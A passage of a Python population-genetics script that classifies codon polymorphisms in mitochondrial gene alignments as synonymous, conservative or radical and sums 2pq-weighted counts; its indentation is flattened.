'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
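# geneticCodes maps a translation-table name to a codon -> amino-acid dict,
# with '*' marking stop codons; the tables mirror the standard NCBI variants
# (standard, invertebrate/vertebrate mitochondrial, ciliate nuclear, etc.).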
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
asexList = []
logfile = open(fasta[0:-5] + 'log','w')  # assumes a '.fasta' extension: 'name.fasta' -> 'name.log'
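# Sequences are sorted by sentinel characters in their FASTA headers: '$'
# marks a population (ingroup) sequence, '*' additionally marks it as sexual,
# anything else is treated as outgroup. The first sexual sequence becomes the
# reference and the first outgroup sequence supplies ancestral codons.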
for seq in seqList:
if '$' in seq:
popList.append(seq)
if '*' in seq:
sexList.append(seq)
else:
asexList.append(seq)
else:
outList.append(seq)
refSeq = seqDict[sexList[0]]
outSeq = seqDict[outList[0]]
outCodons = codonDict[outList[0]]
popInvariantSites = []
popPolymorphicSites = []
logfile.write('Total polymorphisms\n')
sys.stdout.write('Total Polymorphisms\nGene\tSite\tCodon\tAlleles\tAAs\tPol/Div\tMutation Type\t1\t2\t3\t4\t5\t6\t7\tC/R Index\t2*pq\n')
i = 0
sum2PQ_S = 0
sum2PQ_N = 0
sum2PQ_C1 = 0
sum2PQ_C2 = 0
sum2PQ_C3 = 0
sum2PQ_C4 = 0
sum2PQ_C5 = 0
sum2PQ_C6 = 0
sum2PQ_C7 = 0
sum2PQ_R1 = 0
sum2PQ_R2 = 0
sum2PQ_R3 = 0
sum2PQ_R4 = 0
sum2PQ_R5 = 0
sum2PQ_R6 = 0
sum2PQ_R7 = 0
sum2PQ_meanC = 0
sum2PQ_meanR = 0
synS = 0
nsynS = 0
con1S = 0
con2S = 0
con3S = 0
con4S = 0
con5S = 0
con6S = 0
con7S = 0
meanConS = 0
rad1S = 0
rad2S = 0
rad3S = 0
rad4S = 0
rad5S = 0
rad6S = 0
rad7S = 0
meanRadS = 0
N = len(popList)
sexN = len(sexList)
asexN = len(asexList)
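# Main pass: walk the alignment codon by codon, tally allele and amino-acid
# variation within the population, classify each polymorphism as synonymous,
# conservative, or radical (via CRI), and accumulate 2pq-weighted sums.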
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in popList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) < 2:
popInvariantSites.append(i*3)
popInvariantSites.append((i*3) + 1)
popInvariantSites.append((i*3) + 2)
else:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) == 1:
popInvariantSites.append(i*3)
else:
popPolymorphicSites.append(i*3)
variableSites.append(i*3)
if len(site2) == 1:
popInvariantSites.append((i*3) + 1)
else:
popPolymorphicSites.append((i*3) + 1)
variableSites.append((i*3) + 1)
if len(site3) == 1:
popInvariantSites.append((i*3) + 2)
else:
popPolymorphicSites.append((i*3) + 2)
variableSites.append((i*3) + 2)  # third codon position
aaList = []
twoPQ = 2
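# Expected heterozygosity for a biallelic codon: start from 2 and multiply in
# each allele frequency, giving 2*p*q once both frequencies are folded in.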
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = currFreqDict[codon]
twoPQ *= freq
if len(aaList) == 1:
synS += 1
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
nsynS += 1
sum2PQ_N += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ
else:
rad1S += 1
sum2PQ_R1 += twoPQ
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ
else:
rad2S += 1
sum2PQ_R2 += twoPQ
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ
else:
rad3S += 1
sum2PQ_R3 += twoPQ
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ
else:
rad4S += 1
sum2PQ_R4 += twoPQ
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ
else:
rad5S += 1
sum2PQ_R5 += twoPQ
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ
else:
rad6S += 1
sum2PQ_R6 += twoPQ
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ
else:
rad7S += 1
sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ
else:
meanRadS += 1
sum2PQ_meanR += twoPQ
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ) + '\n')
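# NOTE: the conservative/radical tallying above is repeated verbatim for
# every pairwise comparison below. A helper along these lines (hypothetical,
# not in the original script) would collapse each copy into a single call:
#
#   def tallyCRI(mutType, twoPQ, con, rad, sums):
#       for k, flag in enumerate(mutType[:-1]):  # mutType[-1] is the mean CRI
#           if flag == 0:
#               con[k] += 1; sums['C%d' % (k + 1)] += twoPQ
#           else:
#               rad[k] += 1; sums['R%d' % (k + 1)] += twoPQ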
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_S += twoPQ1
sum2PQ_N += twoPQ2
synS += 1
nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
nsynS += 1
synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sum2PQ_S += twoPQ2
sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_S += twoPQ1
sum2PQ_N += twoPQ2
synS += 1
nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
nsynS += 1
synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sum2PQ_S += twoPQ2
sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonC,codonA]  # ancestral codon first, matching the codonA/codonB branches
codonList2 = [codonC,codonB]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
